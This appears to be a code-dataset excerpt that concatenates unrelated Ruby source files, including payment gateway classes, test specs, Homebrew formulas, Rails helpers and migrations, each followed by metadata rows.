return if from_api?
if case_type&.is_fixed_fee?
assign_fixed_total_attrs
else
assign_graduated_total_attrs
end
assign_expenses_total if expenses_changed?
return unless total_changes_required?
assign_total
assign_vat
end
def assign_fixed_total_attrs
assign_fees_total(%i[fixed_fee misc_fees]) if fees_changed?
end
def assign_graduated_total_attrs
assign_fees_total(%i[graduated_fee misc_fees]) if fees_changed?
end
def fees_changed?
if case_type&.is_fixed_fee?
fixed_fee_changed? || misc_fees_changed?
else
graduated_fee_changed? || misc_fees_changed?
end
end
def total_changes_required?
fees_changed? || expenses_changed?
end
def fixed_fee_changed?
fixed_fee&.changed?
end
def graduated_fee_changed?
graduated_fee&.changed?
end
end
end
| 29.144531 | 120 | 0.596703 |
1a6aa88fb04d20fd85acb12573e98b48d4dcb33d | 836 | # (c) Copyright 2020 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
module OneviewCookbook
module API1000
module C7000
# LogicalInterconnectGroup API1000 C7000 provider
class LogicalInterconnectGroupProvider < API800::C7000::LogicalInterconnectGroupProvider
end
end
end
end
| 39.809524 | 94 | 0.77512 |
39f63cac6c78caf57eefabb0859624ca40b9ba2c | 1,276 | # frozen_string_literal: true
module HTTPX
module Loggable
COLORS = {
black: 30,
red: 31,
green: 32,
yellow: 33,
blue: 34,
magenta: 35,
cyan: 36,
white: 37,
}.freeze
def log(level: @options.debug_level, color: nil, &msg)
return unless @options.debug
return unless @options.debug_level >= level
debug_stream = @options.debug
message = (+"" << msg.call << "\n")
message = "\e[#{COLORS[color]}m#{message}\e[0m" if color && debug_stream.respond_to?(:isatty) && debug_stream.isatty
debug_stream << message
end
if Exception.instance_methods.include?(:full_message)
def log_exception(ex, level: @options.debug_level, color: nil)
return unless @options.debug
return unless @options.debug_level >= level
log(level: level, color: color) { ex.full_message }
end
else
def log_exception(ex, level: @options.debug_level, color: nil)
return unless @options.debug
return unless @options.debug_level >= level
message = +"#{ex.message} (#{ex.class})"
message << "\n" << ex.backtrace.join("\n") unless ex.backtrace.nil?
log(level: level, color: color) { message }
end
end
end
end
| 25.52 | 122 | 0.607367 |
01c666639a447b8eff8e5de9653f35ad49748396 | 5,599 | describe Hubspot::Utils do
describe ".properties_to_hash" do
let(:properties) do
{
"email" => { "value" => "[email protected]" },
"firstname" => { "value" => "Bob" },
"lastname" => { "value" => "Smith" }
}
end
subject { Hubspot::Utils.properties_to_hash(properties) }
its(["email"]) { should == "[email protected]" }
its(["firstname"]) { should == "Bob" }
its(["lastname"]) { should == "Smith" }
end
describe ".hash_to_properties" do
let(:hash) do
{
"email" => "[email protected]",
"firstname" => "Bob",
"lastname" => "Smith"
}
end
subject { Hubspot::Utils.hash_to_properties(hash) }
it { should be_an_instance_of Array }
its(:length) { should == 3 }
it { should include({ "property" => "email", "value" => "[email protected]" }) }
it { should include({ "property" => "firstname", "value" => "Bob" }) }
it { should include({ "property" => "lastname", "value" => "Smith" }) }
end
describe '.compare_property_lists for ContactProperties' do
let(:example_groups) do
VCR.use_cassette('contact_properties/groups_example') do
HTTParty.get('https://api.hubapi.com/contacts/v2/groups?hapikey=demo').parsed_response
end
end
let(:example_properties) do
VCR.use_cassette('contact_properties/properties_example') do
HTTParty.get('https://api.hubapi.com/contacts/v2/properties?hapikey=demo').parsed_response
end
end
let(:source) { { 'groups' => example_groups, 'properties' => example_properties } }
let!(:target) { Marshal.load(Marshal.dump(source)) }
context 'with no changes' do
it 'should report no changes' do
skip, new_groups, new_props, update_props = Hubspot::Utils.compare_property_lists(Hubspot::ContactProperties, source, target)
expect(skip.count).to be > 0
expect(new_groups.count).to be(0)
expect(new_props.count).to be(0)
expect(update_props.count).to be(0)
end
end
context 'with changes' do
let(:description) { "#{source['properties'][0]['description']}_XXX" }
count = 0
it 'should report the changes' do
10.times do |i|
if !source['properties'][i]['readOnlyDefinition']
source['properties'][i]['description'] = description
source['properties'][i]['createdUserId'] = 2500
count += 1
end
end
skip, new_groups, new_props, update_props = Hubspot::Utils.compare_property_lists(Hubspot::ContactProperties, source, target)
expect(skip.count).to be > 0
expect(new_groups.count).to be(0)
expect(new_props.count).to be(0)
expect(update_props.count).to be(count)
end
end
end
describe '.compare_property_lists for DealProperties' do
let(:example_groups) do
VCR.use_cassette('deal_groups_example') do
HTTParty.get('https://api.hubapi.com/deals/v1/groups?hapikey=demo').parsed_response
end
end
let(:example_properties) do
VCR.use_cassette('deal_properties_example') do
HTTParty.get('https://api.hubapi.com/deals/v1/properties?hapikey=demo').parsed_response
end
end
let(:source) { { 'groups' => example_groups, 'properties' => example_properties } }
let!(:target) { Marshal.load(Marshal.dump(source)) }
context 'with no changes' do
it 'should report no changes' do
skip, new_groups, new_props, update_props = Hubspot::Utils.compare_property_lists(Hubspot::DealProperties, source, target)
expect(skip.count).to be > 0
expect(new_groups.count).to be(0)
expect(new_props.count).to be(0)
expect(update_props.count).to be(0)
end
end
context 'with changes' do
let(:description) { "#{source['properties'][0]['description']}_XXX" }
count = 0
it 'should report the changes' do
10.times do |i|
if !source['properties'][i]['readOnlyDefinition']
source['properties'][i]['description'] = description
source['properties'][i]['createdUserId'] = 2500
count += 1
end
end
skip, new_groups, new_props, update_props = Hubspot::Utils.compare_property_lists(Hubspot::DealProperties, source, target)
expect(skip.count).to be > 0
expect(new_groups.count).to be(0)
expect(new_props.count).to be(0)
expect(update_props.count).to be(count)
end
end
end
describe ".dump_properties" do
it "prints a deprecation warning" do
VCR.use_cassette("dump_deal_properties_and_groups") do
api_key = "demo"
output = capture_stderr do
Hubspot::Utils.dump_properties(Hubspot::DealProperties, api_key)
end
expected_warning = "Hubspot::Utils.dump_properties is deprecated"
expect(output).to include(expected_warning)
end
end
end
describe ".restore_properties" do
it "prints a deprecation warning" do
VCR.use_cassette("restore_deal_properties_and_groups") do
api_key = "demo"
properties = {"groups" => {}, "properties" => {}}
output = capture_stderr do
Hubspot::Utils.restore_properties(
Hubspot::DealProperties,
api_key,
properties
)
end
expected_warning = "Hubspot::Utils.restore_properties is deprecated"
expect(output).to include(expected_warning)
end
end
end
end
| 33.933333 | 133 | 0.616539 |
08af51dbe7c4b5207bce315be91028c9f588408d | 3,619 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'Protected Environments' do
let(:project) { create(:project, :repository) }
let(:user) { create(:user) }
let(:environments) { %w(production development staging test) }
before do
stub_licensed_features(protected_environments: true)
environments.each do |environment_name|
create(:environment, name: environment_name, project: project)
end
create(:protected_environment, project: project, name: 'production')
create(:protected_environment, project: project, name: 'removed environment')
sign_in(user)
end
context 'logged in as developer' do
before do
project.add_developer(user)
visit project_settings_ci_cd_path(project)
end
it 'does not have access to Protected Environments settings' do
expect(page).to have_gitlab_http_status(:not_found)
end
end
context 'logged in as a maintainer' do
before do
project.add_maintainer(user)
visit project_settings_ci_cd_path(project)
end
it 'has access to Protected Environments settings' do
expect(page).to have_gitlab_http_status(:ok)
end
it 'allows seeing a list of protected environments' do
within('.protected-branches-list') do
expect(page).to have_content('production')
expect(page).to have_content('removed environment')
end
end
it 'allows creating explicit protected environments', :js do
set_protected_environment('staging')
within('.js-new-protected-environment') do
set_allowed_to_deploy('Developers + Maintainers')
click_on('Protect')
end
wait_for_requests
within('.protected-branches-list') do
expect(page).to have_content('staging')
end
end
it 'allows updating access to a protected environment', :js, quarantine: 'https://gitlab.com/gitlab-org/gitlab/-/issues/11086' do
within('.protected-branches-list tr', text: 'production') do
set_allowed_to_deploy('Developers + Maintainers')
end
visit project_settings_ci_cd_path(project)
within('.protected-branches-list') do
expect(page).to have_content('1 role, 1 user')
end
end
it 'allows unprotecting an environment', :js do
within('.protected-branches-list tr', text: 'production') do
accept_alert { click_on('Unprotect') }
end
wait_for_requests
within('.protected-branches-list') do
expect(page).not_to have_content('production')
end
end
context 'when projects_tokens_optional_encryption feature flag is false' do
before do
stub_feature_flags(projects_tokens_optional_encryption: false)
end
context 'when runners_token exists but runners_token_encrypted is empty' do
before do
project.update_column(:runners_token, 'abc')
project.update_column(:runners_token_encrypted, nil)
end
it 'shows setting page correctly' do
visit project_settings_ci_cd_path(project)
expect(page).to have_gitlab_http_status(:ok)
end
end
end
end
def set_protected_environment(environment_name)
within('.js-new-protected-environment') do
find('.js-protected-environment-select').click
find('.dropdown-input-field').set(environment_name)
find('.is-focused').click
end
end
def set_allowed_to_deploy(option)
click_button('Select users')
within '.gl-new-dropdown-contents' do
Array(option).each { |opt| find('.gl-new-dropdown-item', text: opt).click }
end
end
end
| 28.273438 | 133 | 0.688035 |
f8d725abe2cd59aa78ab57141da39068a6f6230f | 1,039 | require 'paypalhttp'
require "base64"
module PayPal
SANDBOXAPI = 'https://api.sandbox.paypal.com'
LIVEAPI = 'https://api.paypal.com'
SANDBOXWEB = 'https://sandbox.paypal.com'
LIVEWEB = 'https://paypal.com'
class PayPalEnvironment < PayPalHttp::Environment
attr_accessor :client_id, :client_secret, :web_url
def initialize(client_id, client_secret, base_url, web_url)
super(base_url)
@client_id = client_id
@client_secret = client_secret
@web_url = web_url
end
def authorizationString
encoded = Base64.strict_encode64("#{@client_id}:#{@client_secret}")
return "Basic #{encoded}"
end
end
class SandboxEnvironment < PayPal::PayPalEnvironment
def initialize(client_id, client_secret)
super(client_id, client_secret, PayPal::SANDBOXAPI, PayPal::SANDBOXWEB)
end
end
class LiveEnvironment < PayPal::PayPalEnvironment
def initialize(client_id, client_secret)
super(client_id, client_secret, PayPal::LIVEAPI, PayPal::LIVEWEB)
end
end
end | 27.342105 | 77 | 0.715111 |
b9f7256b938ac0664711e7a7c7e2e98b73f580fb | 358 | module Ecm::Contact
# Preview all emails at http://localhost:3000/rails/mailers/ecm/contact/contact_request_mailer
class ContactRequestMailerPreview < ActionMailer::Preview
# Preview this email at http://localhost:3000/rails/mailers/ecm/contact/contact_request_mailer/notify
def notify
ContactRequestMailerMailer.notify
end
end
end
| 29.833333 | 105 | 0.784916 |
e8efcf7bca95fc6c50789f55aafdd59281f3a098 | 164 | class CreateCollections < ActiveRecord::Migration[6.0]
def change
create_table :collections do |t|
t.string :name
t.timestamps
end
end
end
| 18.222222 | 54 | 0.676829 |
1d0991b5f8cb468015ab0590a3ae882b9e0ea0eb | 452 | module SwellMedia
class MediaPolicy < ApplicationPolicy
def admin?
user.admin?
end
def admin_create?
user.admin?
end
def admin_destroy?
user.admin? or record.user == user
end
def admin_edit?
user.admin? or record.user == user
end
def admin_empty_trash?
user.admin?
end
def admin_preview?
user.admin? or record.user == user
end
def admin_update?
user.admin? or record.user == user
end
end
end | 14.125 | 38 | 0.676991 |
b99ba93384b603efd3ea9de115a77b31d2bb87dc | 6,597 | require "cgi"
module BrowseHelper
def printable_name(object, version = false)
id = if object.id.is_a?(Array)
object.id[0]
else
object.id
end
name = t "printable_name.with_id", :id => id.to_s
name = t "printable_name.with_version", :id => name, :version => object.version.to_s if version
# don't look at object tags if redacted, so as to avoid giving
# away redacted version tag information.
unless object.redacted?
locale = I18n.locale.to_s
locale = locale.sub(/-[^-]+/, "") while locale =~ /-[^-]+/ && !object.tags.include?("name:#{I18n.locale}")
if object.tags.include? "name:#{locale}"
name = t "printable_name.with_name_html", :name => content_tag(:bdi, object.tags["name:#{locale}"].to_s), :id => content_tag(:bdi, name)
elsif object.tags.include? "name"
name = t "printable_name.with_name_html", :name => content_tag(:bdi, object.tags["name"].to_s), :id => content_tag(:bdi, name)
elsif object.tags.include? "ref"
name = t "printable_name.with_name_html", :name => content_tag(:bdi, object.tags["ref"].to_s), :id => content_tag(:bdi, name)
end
end
name
end
def link_class(type, object)
classes = [type]
if object.redacted?
classes << "deleted"
else
classes += icon_tags(object).flatten.map { |t| h(t) }
classes << "deleted" unless object.visible?
end
classes.join(" ")
end
def link_title(object)
if object.redacted?
""
else
h(icon_tags(object).map { |k, v| k + "=" + v }.to_sentence)
end
end
def link_follow(object)
"nofollow" if object.tags.empty?
end
def format_key(key)
if url = wiki_link("key", key)
link_to h(key), url, :title => t("browse.tag_details.wiki_link.key", :key => key)
else
h(key)
end
end
def format_value(key, value)
if wp = wikipedia_link(key, value)
link_to h(wp[:title]), wp[:url], :title => t("browse.tag_details.wikipedia_link", :page => wp[:title])
elsif wdt = wikidata_links(key, value)
# IMPORTANT: Note that wikidata_links() returns an array of hashes, unlike for example wikipedia_link(),
# which just returns one such hash.
wdt = wdt.map do |w|
link_to(w[:title], w[:url], :title => t("browse.tag_details.wikidata_link", :page => w[:title].strip))
end
safe_join(wdt, ";")
elsif url = wiki_link("tag", "#{key}=#{value}")
link_to h(value), url, :title => t("browse.tag_details.wiki_link.tag", :key => key, :value => value)
elsif url = telephone_link(key, value)
link_to h(value), url, :title => t("browse.tag_details.telephone_link", :phone_number => value)
else
linkify h(value)
end
end
def type_and_paginated_count(type, pages)
if pages.page_count == 1
t "browse.changeset.#{type}",
:count => pages.item_count
else
t "browse.changeset.#{type}_paginated",
:x => pages.current_page.first_item,
:y => pages.current_page.last_item,
:count => pages.item_count
end
end
private
ICON_TAGS = %w[aeroway amenity barrier building highway historic landuse leisure man_made natural railway shop tourism waterway].freeze
def icon_tags(object)
object.tags.find_all { |k, _v| ICON_TAGS.include? k }.sort
end
def wiki_link(type, lookup)
locale = I18n.locale.to_s
# update-wiki-pages does s/ /_/g on keys before saving them, we
# have to replace spaces with underscore so we'll link
# e.g. `source=Isle of Man Government aerial imagery (2001)' to
# the correct page.
lookup_us = lookup.tr(" ", "_")
if page = WIKI_PAGES.dig(locale, type, lookup_us)
url = "https://wiki.openstreetmap.org/wiki/#{page}?uselang=#{locale}"
elsif page = WIKI_PAGES.dig("en", type, lookup_us)
url = "https://wiki.openstreetmap.org/wiki/#{page}?uselang=#{locale}"
end
url
end
def wikipedia_link(key, value)
# Some k/v's are wikipedia=http://en.wikipedia.org/wiki/Full%20URL
return nil if value =~ %r{^https?://}
if key == "wikipedia"
# This regex should match Wikipedia language codes, everything
# from de to zh-classical
lang = if value =~ /^([a-z-]{2,12}):(.+)$/i
# Value is <lang>:<title> so split it up
# Note that value is always left as-is, see: https://trac.openstreetmap.org/ticket/4315
Regexp.last_match(1)
else
# Value is <title> so default to English Wikipedia
"en"
end
elsif key =~ /^wikipedia:(\S+)$/
# Language is in the key, so assume value is the title
lang = Regexp.last_match(1)
else
# Not a wikipedia key!
return nil
end
if value =~ /^([^#]*)#(.*)/
# Contains a reference to a section of the wikipedia article
# Must break it up to correctly build the url
value = Regexp.last_match(1)
section = "#" + Regexp.last_match(2)
encoded_section = "#" + CGI.escape(Regexp.last_match(2).gsub(/ +/, "_")).tr("%", ".")
else
section = ""
encoded_section = ""
end
{
:url => "https://#{lang}.wikipedia.org/wiki/#{value}?uselang=#{I18n.locale}#{encoded_section}",
:title => value + section
}
end
def wikidata_links(key, value)
# The simple wikidata-tag (this is limited to only one value)
if key == "wikidata" && value =~ /^[Qq][1-9][0-9]*$/
return [{
:url => "//www.wikidata.org/wiki/#{value}?uselang=#{I18n.locale}",
:title => value
}]
# Key has to be one of the accepted wikidata-tags
elsif key =~ /(architect|artist|brand|name:etymology|network|operator|subject):wikidata/ &&
# Value has to be a semicolon-separated list of wikidata-IDs (whitespaces allowed before and after semicolons)
value =~ /^[Qq][1-9][0-9]*(\s*;\s*[Qq][1-9][0-9]*)*$/
# Splitting at every semicolon to get a separate hash for each wikidata-ID
return value.split(";").map do |id|
{ :title => id, :url => "//www.wikidata.org/wiki/#{id.strip}?uselang=#{I18n.locale}" }
end
end
nil
end
def telephone_link(_key, value)
# does it look like a phone number? eg "+1 (234) 567-8901 " ?
return nil unless value =~ %r{^\s*\+[\d\s\(\)/\.-]{6,25}\s*$}
# remove all whitespace instead of encoding it http://tools.ietf.org/html/rfc3966#section-5.1.1
# "+1 (234) 567-8901 " -> "+1(234)567-8901"
value_no_whitespace = value.gsub(/\s+/, "")
"tel:#{value_no_whitespace}"
end
end
| 34.359375 | 144 | 0.610884 |
28343b2b8687f41a1035c77eaf0c49419e479e88 | 848 | require 'rip/version'
Gem::Specification.new do |s|
s.name = "rip"
s.version = Rip::Version
s.date = Time.now.strftime('%Y-%m-%d')
s.summary = "Take back your $LOAD_PATH"
s.homepage = "http://hellorip.com"
s.email = "[email protected]"
s.authors = [ "Chris Wanstrath", "Joshua Peek" ]
s.has_rdoc = false
s.files = %w( README.md Rakefile LICENSE )
s.files += Dir.glob("lib/**/*")
s.files += Dir.glob("bin/**/*")
s.files += Dir.glob("man/**/*")
s.files += Dir.glob("test/**/*")
s.executables = %w( rip )
s.description = <<desc
rip creates and manages environments of packages. rip packages
may be created from RubyGems, git repositories, or more.
Feed me.
desc
end
| 32.615385 | 62 | 0.522406 |
87aa9ababd0eae71931a0e82578c3b8a9b692f14 | 9,005 | module ActiveMerchant #:nodoc:
module Billing #:nodoc:
class SecureNetGateway < Gateway
API_VERSION = "4.0"
TRANSACTIONS = {
:auth_only => "0000",
:auth_capture => "0100",
:prior_auth_capture => "0200",
:void => "0400",
:credit => "0500"
}
XML_ATTRIBUTES = {
'xmlns' => "http://gateway.securenet.com/API/Contracts",
'xmlns:i' => "http://www.w3.org/2001/XMLSchema-instance"
}
NIL_ATTRIBUTE = { 'i:nil' => "true" }
self.supported_countries = ['US']
self.supported_cardtypes = [:visa, :master, :american_express, :discover]
self.homepage_url = 'http://www.securenet.com/'
self.display_name = 'SecureNet'
self.test_url = 'https://certify.securenet.com/API/gateway.svc/webHttp/ProcessTransaction'
self.live_url = 'https://gateway.securenet.com/api/Gateway.svc/webHttp/ProcessTransaction'
APPROVED, DECLINED = 1, 2
CARD_CODE_ERRORS = %w( N S )
AVS_ERRORS = %w( A E N R W Z )
def initialize(options = {})
requires!(options, :login, :password)
super
end
def authorize(money, creditcard, options = {})
commit(build_sale_or_authorization(creditcard, options, :auth_only, money))
end
def purchase(money, creditcard, options = {})
commit(build_sale_or_authorization(creditcard, options, :auth_capture, money))
end
def capture(money, authorization, options = {})
commit(build_capture_refund_void(authorization, options, :prior_auth_capture, money))
end
def void(authorization, options = {})
commit(build_capture_refund_void(authorization, options, :void))
end
def refund(money, authorization, options = {})
commit(build_capture_refund_void(authorization, options, :credit, money))
end
def credit(money, authorization, options = {})
ActiveMerchant.deprecated CREDIT_DEPRECATION_MESSAGE
refund(money, authorization, options)
end
private
def commit(request)
xml = build_request(request)
url = test? ? self.test_url : self.live_url
data = ssl_post(url, xml, "Content-Type" => "text/xml")
response = parse(data)
Response.new(success?(response), message_from(response), response,
:test => test?,
:authorization => build_authorization(response),
:avs_result => { :code => response[:avs_result_code] },
:cvv_result => response[:card_code_response_code]
)
end
def build_request(request)
xml = Builder::XmlMarkup.new
xml.instruct!
xml.tag!("TRANSACTION", XML_ATTRIBUTES) do
xml << request
end
xml.target!
end
def build_sale_or_authorization(creditcard, options, action, money)
xml = Builder::XmlMarkup.new
xml.tag! 'AMOUNT', amount(money)
add_credit_card(xml, creditcard)
add_params_in_required_order(xml, action, creditcard, options)
add_more_required_params(xml, options)
xml.target!
end
def build_capture_refund_void(authorization, options, action, money = nil)
xml = Builder::XmlMarkup.new
transaction_id, amount_in_ref, last_four = split_authorization(authorization)
xml.tag! 'AMOUNT', amount(money) || amount_in_ref
xml.tag!("CARD") do
xml.tag! 'CARDNUMBER', last_four
end
add_params_in_required_order(xml, action, nil, options)
xml.tag! 'REF_TRANSID', transaction_id
add_more_required_params(xml, options)
xml.target!
end
def add_credit_card(xml, creditcard)
xml.tag!("CARD") do
xml.tag! 'CARDCODE', creditcard.verification_value if creditcard.verification_value?
xml.tag! 'CARDNUMBER', creditcard.number
xml.tag! 'EXPDATE', expdate(creditcard)
end
end
def add_customer_data(xml, options)
if options.has_key? :customer
xml.tag! 'CUSTOMERID', options[:customer]
end
if options.has_key? :ip
xml.tag! 'CUSTOMERIP', options[:ip]
end
end
def add_address(xml, creditcard, options)
return unless creditcard
if address = options[:billing_address] || options[:address]
xml.tag!("CUSTOMER_BILL") do
xml.tag! 'ADDRESS', address[:address1].to_s
xml.tag! 'CITY', address[:city].to_s
xml.tag! 'COMPANY', address[:company].to_s
xml.tag! 'COUNTRY', address[:country].to_s
if options.has_key? :email
xml.tag! 'EMAIL', options[:email]
xml.tag! 'EMAILRECEIPT', 'FALSE'
end
xml.tag! 'FIRSTNAME', creditcard.first_name
xml.tag! 'LASTNAME', creditcard.last_name
xml.tag! 'PHONE', address[:phone].to_s
xml.tag! 'STATE', address[:state].blank? ? 'n/a' : address[:state]
xml.tag! 'ZIP', address[:zip].to_s
end
end
if address = options[:shipping_address]
xml.tag!("CUSTOMER_SHIP") do
xml.tag! 'ADDRESS', address[:address1].to_s
xml.tag! 'CITY', address[:city].to_s
xml.tag! 'COMPANY', address[:company].to_s
xml.tag! 'COUNTRY', address[:country].to_s
if address[:name]
names = address[:name].split
last_name = names.pop
first_name = names.join(" ")
xml.tag! 'FIRSTNAME', first_name
xml.tag! 'LASTNAME', last_name
else
xml.tag! 'FIRSTNAME', address[:first_name].to_s
xml.tag! 'LASTNAME', address[:last_name].to_s
end
xml.tag! 'STATE', address[:state].blank? ? 'n/a' : address[:state]
xml.tag! 'ZIP', address[:zip].to_s
end
else
xml.tag!('CUSTOMER_SHIP', NIL_ATTRIBUTE) do
end
end
end
def add_merchant_key(xml, options)
xml.tag!("MERCHANT_KEY") do
xml.tag! 'GROUPID', 0
xml.tag! 'SECUREKEY', @options[:password]
xml.tag! 'SECURENETID', @options[:login]
end
end
# SecureNet requires some of the xml params to be in a certain order. http://cl.ly/image/3K260E0p0a0n/content.png
def add_params_in_required_order(xml, action, creditcard, options)
xml.tag! 'CODE', TRANSACTIONS[action]
add_customer_data(xml, options)
add_address(xml, creditcard, options)
xml.tag! 'DCI', 0 # No duplicate checking will be done, except for ORDERID
xml.tag! 'INSTALLMENT_SEQUENCENUM', 1
xml.tag! 'INVOICEDESC', options[:invoice_description] if options[:invoice_description]
xml.tag! 'INVOICENUM', options[:invoice_number] if options[:invoice_number]
add_merchant_key(xml, options)
xml.tag! 'METHOD', 'CC'
xml.tag! 'NOTE', options[:description] if options[:description]
xml.tag! 'ORDERID', options[:order_id]
xml.tag! 'OVERRIDE_FROM', 0 # Docs say not required, but doesn't work without it
end
def add_more_required_params(xml, options)
xml.tag! 'RETAIL_LANENUM', '0'
xml.tag! 'TEST', 'TRUE' if test?
xml.tag! 'TOTAL_INSTALLMENTCOUNT', 0
xml.tag! 'TRANSACTION_SERVICE', 0
end
def success?(response)
response[:response_code].to_i == APPROVED
end
def message_from(response)
if response[:response_code].to_i == DECLINED
return CVVResult.messages[ response[:card_code_response_code] ] if CARD_CODE_ERRORS.include?(response[:card_code_response_code])
return AVSResult.messages[ response[:avs_result_code] ] if AVS_ERRORS.include?(response[:avs_result_code])
end
return response[:response_reason_text].nil? ? '' : response[:response_reason_text][0..-1]
end
def parse(xml)
response = {}
xml = REXML::Document.new(xml)
root = REXML::XPath.first(xml, "//GATEWAYRESPONSE")
if root
root.elements.to_a.each do |node|
recurring_parse_element(response, node)
end
end
response
end
def recurring_parse_element(response, node)
if node.has_elements?
node.elements.each{|e| recurring_parse_element(response, e) }
else
response[node.name.underscore.to_sym] = node.text
end
end
def split_authorization(authorization)
transaction_id, amount, last_four = authorization.split("|")
[transaction_id, amount, last_four]
end
def build_authorization(response)
[response[:transactionid], response[:transactionamount], response[:last4_digits]].join("|")
end
end
end
end
| 34.109848 | 138 | 0.6 |
d50389f9fd60a8c3a2e948f27fdf71112866da28 | 114 | class AddTokenToTickets < ActiveRecord::Migration
def change
add_column :tickets, :token, :string
end
end
| 19 | 49 | 0.754386 |
08ad7737e529397e08c0d191683d9bd52f50ffe2 | 1,366 | class Cig < Formula
desc "CLI app for checking the state of your git repositories"
homepage "https://github.com/stevenjack/cig"
url "https://github.com/stevenjack/cig/archive/v0.1.5.tar.gz"
sha256 "545a4a8894e73c4152e0dcf5515239709537e0192629dc56257fe7cfc995da24"
license "MIT"
head "https://github.com/stevenjack/cig.git"
bottle do
cellar :any_skip_relocation
rebuild 2
sha256 "79ca68ff327c9de3193100fcbd5c010ea003377d902900b3f23dcaa1d6319e16" => :big_sur
sha256 "bb93970229fc7a62a6ca4b0c446ad36f135d2160aa0dce04fa5afbdc072291d3" => :catalina
sha256 "6ae38e73bed4326d85c7f31498b0a5715d877c7a2e32aad9987ba7726efe240e" => :mojave
sha256 "9215f225d4b314d1047f6bb4e5c909b82b456d2005fffed8c637ca2d63641791" => :high_sierra
sha256 "5d4eb1f34f8b185513d59dc9072f1a95555dd222f0f7a0526c89983e1643fef6" => :sierra
end
depends_on "go" => :build
depends_on "godep" => :build
def install
ENV["GOPATH"] = buildpath
(buildpath/"src/github.com/stevenjack").mkpath
ln_s buildpath, "src/github.com/stevenjack/cig"
system "godep", "restore"
system "go", "build", "-o", bin/"cig"
end
test do
repo_path = "#{testpath}/test"
system "git", "init", "--bare", repo_path
(testpath/".cig.yaml").write <<~EOS
test_project: #{repo_path}
EOS
system "#{bin}/cig", "--cp=#{testpath}"
end
end
| 35.025641 | 93 | 0.732796 |
f80bb4ce71375c66b7e6605ade79b379776a1350 | 228 | class UserToken < ActiveRecord::Base
after_create :generate_token
private
def generate_token
self.token = Digest::SHA1.hexdigest("--#{self.user_id}-mmmm-salty-#{self.created_at.to_s}--")
self.save
end
end
| 17.538462 | 97 | 0.701754 |
7aa8199f27ab82d794796976323354338b82d109 | 533 | # encoding: utf-8
# frozen_string_literal: true
module ProxyPacRb
module Cli
# Shared methods for all cli commands
module Shared
# Enable debug mode
def enable_debug_mode
ProxyPacRb.enable_debug_mode if options[:debug_mode] == true
end
# Remove proxy variables
def remove_proxy_environment_variables
%w(
http_proxy
https_proxy
HTTP_PROXY
HTTPS_PROXY
).each do |v|
ENV.delete(v)
end
end
end
end
end
| 20.5 | 68 | 0.60788 |
f8329da4f2b5289a604f92b02881abbd0657be08 | 190 | # frozen_string_literal: true
FactoryBot.define do
factory :pdf_template, class: "CscCore::PdfTemplate" do
name { FFaker::Name.name }
language_code { "km" }
program
end
end
| 19 | 57 | 0.7 |
f7deafe69242d97954cb17f0d10f52e36541ef20 | 968 | class Zsdx < Formula
desc "Zelda Mystery of Solarus DX"
homepage "http://www.solarus-games.org/games/zelda-mystery-of-solarus-dx/"
url "https://github.com/christopho/zsdx/archive/zsdx-1.11.0.tar.gz"
sha256 "05a5d220bbf2439c9da2e71cd9d104240878123fff5bc702e2405d6d0712f0dc"
head "https://github.com/christopho/zsdx.git"
bottle do
cellar :any_skip_relocation
sha256 "2787c78e1b24669a1befa354724f77b6a86abf2aade492fe211c296482855cf8" => :sierra
sha256 "2a1132ca3dc96d98332d99e1a37b1d2f46206fdad88066f96fedcfbf796452b3" => :el_capitan
sha256 "c9fd0e90a1cf311d30a3e5b961e15a2e8a5a2400b1d985fc4f8c4591cca051d4" => :yosemite
end
depends_on "cmake" => :build
depends_on "solarus"
def install
system "cmake", ".", *std_cmake_args, "-DSOLARUS_INSTALL_DATADIR=#{share}"
system "make", "install"
end
test do
system Formula["solarus"].bin/"solarus-run", "-help"
system "/usr/bin/unzip", pkgshare/"data.solarus"
end
end
| 34.571429 | 92 | 0.757231 |
5dd312c35f7c5f4fe159b589428b9c5eab4b7498 | 1,241 | # frozen_string_literal: true
module AbideDevUtils
module Files
class Writer
MSG_EXT_APPEND = 'Appending %s extension to file'
def write(content, file: nil, add_ext: true, file_ext: nil)
valid_file = add_ext ? append_ext(file, file_ext) : file
File.open(valid_file, 'w') { |f| f.write(content) }
verify_write(valid_file)
end
def method_missing(m, *args, **kwargs, &_block)
if m.to_s.match?(/^write_/)
ext = m.to_s.split('_')[-1]
write(args[0], **kwargs, file_ext: ext)
else
super
end
end
def respond_to_missing?(method_name, include_private = false)
method_name.to_s.start_with?('write_') || super
end
def append_ext(file_path, ext)
return file_path if ext.nil?
s_ext = ".#{ext}"
unless File.extname(file_path) == s_ext
puts MSG_EXT_APPEND % s_ext
file_path << s_ext
end
file_path
end
def verify_write(file_path)
if File.file?(file_path)
puts "Successfully wrote to #{file_path}"
else
puts "Something went wrong! Failed writing to #{file_path}!"
end
end
end
end
end
| 25.854167 | 70 | 0.587429 |
b969a0d80ae04d1572035bb771ca23a4a3b02f08 | 108 | # frozen_string_literal: true
module Admin
class KidHerosController < Koi::AdminCrudController
end
end
| 15.428571 | 53 | 0.805556 |
5d79f247424284b4534b89247d8a1272e418c121 | 891 | require_relative '../spec_helper'
describe FoodCritic::Review do
it "is instantiable with no warnings" do
FoodCritic::Review.new('example', [], false)
end
describe "#cookbook_paths" do
it "returns the cookbook paths provided" do
FoodCritic::Review.new(['example'], [], false).cookbook_paths.must_equal ['example']
end
it "returns the cookbook paths provided when there are multiple" do
FoodCritic::Review.new(['example', 'example2'], [], false).cookbook_paths.must_equal ['example', 'example2']
end
end
describe "#warnings" do
it "returns empty when there are no warnings" do
FoodCritic::Review.new('example', [], false).warnings.must_be_empty
end
it "makes the warnings available" do
warning = 'Danger Will Robinson'
FoodCritic::Review.new('example', [warning], false).warnings.must_equal [warning]
end
end
end
| 35.64 | 114 | 0.694725 |
3809cd675ba0a1a26b089b733d008e5da9c78a61 | 1,311 | require "language/node"
class GulpCli < Formula
desc "Command-line utility for Gulp"
homepage "https://github.com/gulpjs/gulp-cli"
url "https://registry.npmjs.org/gulp-cli/-/gulp-cli-2.3.0.tgz"
sha256 "0a5a76e5be9856edf019fb5be0ed8501a8d815da1beeb9c6effca07a93873ba4"
license "MIT"
